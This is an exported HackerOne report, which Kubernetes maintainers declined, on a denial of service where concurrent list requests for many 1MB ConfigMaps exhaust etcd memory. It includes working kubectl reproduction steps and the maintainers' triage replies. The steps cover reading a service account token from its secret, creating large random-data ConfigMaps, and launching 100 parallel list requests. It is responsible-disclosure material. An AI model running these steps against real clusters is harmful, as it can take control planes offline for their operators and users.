Report -- NOT ACCEPTED -- on potential Denial of Service to the Kubernetes Security Team.

Notes:

  • The report was not accepted. I intend to file a public issue, but haven't yet.
  • Kubernetes asks for reports to be submitted through https://hackerone.com, which is where I submitted this report. This is an export of that report.

Title: Concurrent list requests of many, large Kubernetes resources cause etcd members to exhaust almost all available memory
Scope: https://github.com/kubernetes/kubernetes
Weakness: Denial of Service
Severity: Medium (6.5)
Link: /reports/1058775
Date: 2020-12-14 21:20:50 +0000
By: @dlipovetsky
CVE IDs:

Details:

Summary:

In a Kubernetes cluster deployed with the default configuration, a user who can create and list large (e.g. 1MB) resources (e.g. ConfigMaps) can cause one or more etcd members to exhaust almost all available memory on the host, which causes one or more control plane replicas to become unavailable. Although the kernel OOM-kills multiple processes, including etcd, in my experiments the affected control plane replicas had to be restarted to become available again.

Moreover, any client (e.g. a controller) that watches these resources may exhaust its own available memory (e.g. memory restricted by a quota) when synchronizing its cache.

As the available memory of each control plane replica increases, so do the number of resources that must be created and the number of concurrent list requests required to reproduce this vulnerability. For 3 control plane replicas, each with 16GB of system memory, 200 1MB ConfigMaps and 100 concurrent list requests should be sufficient; as a rough estimate, each list returns ~200MB of ConfigMap data, so 100 concurrent lists ask etcd to buffer on the order of 20GB of responses. I have not yet looked for an upper bound on either the number of resources or the number of concurrent list requests.

In v1.20, API Priority and Fairness is enabled by default. It has had no effect in my experiments: although some of the concurrent list requests are throttled, etcd still exhausts available memory. To be fair, I have not changed the default configuration.
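
For reference, one way to confirm that API Priority and Fairness is active (using an admin kubeconfig, not the limited service account used below) is to list its configuration objects; a minimal sketch:

# List the built-in priority levels and flow schemas used by the apiserver (admin credentials required).
kubectl get prioritylevelconfigurations.flowcontrol.apiserver.k8s.io
kubectl get flowschemas.flowcontrol.apiserver.k8s.io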

I have also replicated these experiments with Secrets (which, unlike ConfigMaps, can be larger than 1MB). Other resources may also work.

Kubernetes Version:

  • v1.20.0
  • v1.19.x
  • v1.18.x

Component Version:

  • etcd v3.4.13
  • etcd v3.4.3

Steps To Reproduce:

  1. Deploy a Kubernetes cluster with the default configuration. I used kubeadm on an Ubuntu 20.04 VM.

  2. Create role and rolebinding for system:serviceaccount:default:default

USER="system:serviceaccount:default:default"
kubectl create role configmap-readwriter --verb=create,list --resource=configmap
kubectl create rolebinding default-configmap-readwriter --user "$USER" --role configmap-readwriter
  3. Create a kubeconfig context for "system:serviceaccount:default:default" and cluster "kubernetes". Note: You may need to change the CLUSTERNAME value.
CLUSTERNAME=kubernetes
TOKENNAME="$(kubectl get serviceaccount/default -o jsonpath='{.secrets[0].name}')"
TOKEN="$(kubectl get secret $TOKENNAME -o=jsonpath='{.data.token}' | base64 --decode)"
kubectl config set-credentials default-sa --token="$TOKEN"
kubectl config set-context default-sa --user=default-sa --cluster="$CLUSTERNAME"
  4. (Optional) Verify the limited privileges
kubectl config use-context default-sa
kubectl auth can-i --list
  5. (Optional) Observe the available memory on one or more control plane replicas. For example, use watch "free -h".

  6. Using the context created in Step 3, create 200 ConfigMaps, 1MB each, in the default namespace

    kubectl config use-context default-sa
    cat > cm.yaml <<EOF
    apiVersion: v1
    kind: ConfigMap
    metadata:
      generateName: payload-
    data:
      payload: $(base64 --wrap=0 /dev/urandom | head -c 1024768)
    EOF
    for i in {1..200}; do kubectl create -f cm.yaml; done
  7. Using the context created in Step 3, list all ConfigMaps in the default namespace, 100 times, concurrently

kubectl config use-context default-sa
for i in {1..100}; do kubectl get configmaps & done
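
While the concurrent list requests run, the effect on etcd itself can be observed directly on a control plane replica; a minimal sketch, assuming SSH access to the replica and that the etcd process is visible on the host (as with kubeadm static pods):

# Show overall memory and etcd's resident set size (RSS, in KiB), refreshing every second.
watch -n1 'free -h; ps -C etcd -o rss,cmd'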

Supporting Material/References:

Exhausting available memory while responding to list queries seems to be a known issue for etcd: etcd-io/etcd#12457 (comment). There is a proposal to add a QoS mechanism to protect etcd from its clients.

Impact:

An attack could make the cluster control plane unavailable. It could also cause other API clients (e.g. controllers) to exhaust their available memory.

Timeline:

2020-12-14 21:23:37 +0000: @dlipovetsky (comment) This is my first time estimating CVE severity. My coworkers reviewed my report, and had no objections, but I take responsibility, and apologize, if the severity is incorrect.


2020-12-15 11:35:06 +0000: @turtle_shell (bug triaged) Hello @dlipovetsky,

Thank you for your submission! We were able to validate your report, and have submitted it to the appropriate remediation team for review. They will let us know the final ruling on this report, and when/if a fix will be implemented. Please note that the status and severity are subject to change.

Regards, @turtle_shell


2020-12-15 11:41:34 +0000: @turtle_shell (report severity updated)


2020-12-15 16:58:24 +0000: @dlipovetsky (comment) Thanks for triaging this, and the update, @turtle_shell.

I realize that this issue might be seen as a failure of "tuning the control plane for the appropriate scale," but I suspect that the attack works at any scale, though I admit I have not tested this exhaustively.


2020-12-16 17:30:31 +0000: @dlipovetsky (comment)

Quoting my earlier statement, "There is a proposal to add a QoS mechanism to protect etcd from its clients": I misunderstood this proposal. It's more about fairness, and I don't think it will address the issue I'm reporting.


2020-12-18 22:40:25 +0000: @tallclair (bug informative) I've reviewed this issue with several of the kubernetes API machinery leads, and we've concluded that this is largely working as intended. Existing mitigations include:

  1. we don't allow anonymous users to do this
  2. resourcequota can be used to limit how many configmaps can exist in a namespace
  3. the audit logs let you find which user is abusing you
  4. naughty, non-anonymous users can be handled out of band
  5. naughty, non-anonymous users that aren't constrained by quota can do all sorts of bad things to your cluster

Furthermore, there are known scalability issues with list requests, but those are being handled as scalability and performance bugs, not as security issues.

If you are not satisfied with these mitigations, I encourage you to file a public issue or raise the concerns with SIG API Machinery.


2020-12-18 22:40:51 +0000: @tallclair (agreed on going public)


2020-12-19 00:08:46 +0000: @dlipovetsky (comment) Thanks for reviewing, and the feedback, @tallclair.

I'll take some time to see whether I can reproduce this taking namespace resource quotas into account.
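
As a starting point for those experiments, a namespace quota capping the number of ConfigMaps could be created as follows; a minimal sketch, with the quota name and limit chosen arbitrarily:

# Limit the default namespace to at most 10 ConfigMaps.
kubectl create quota configmap-count --hard=count/configmaps=10 --namespace=default

Note that such a quota bounds how many ConfigMaps can exist, not how large each one is, so it caps the total data available to the attack rather than the size of any single object.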
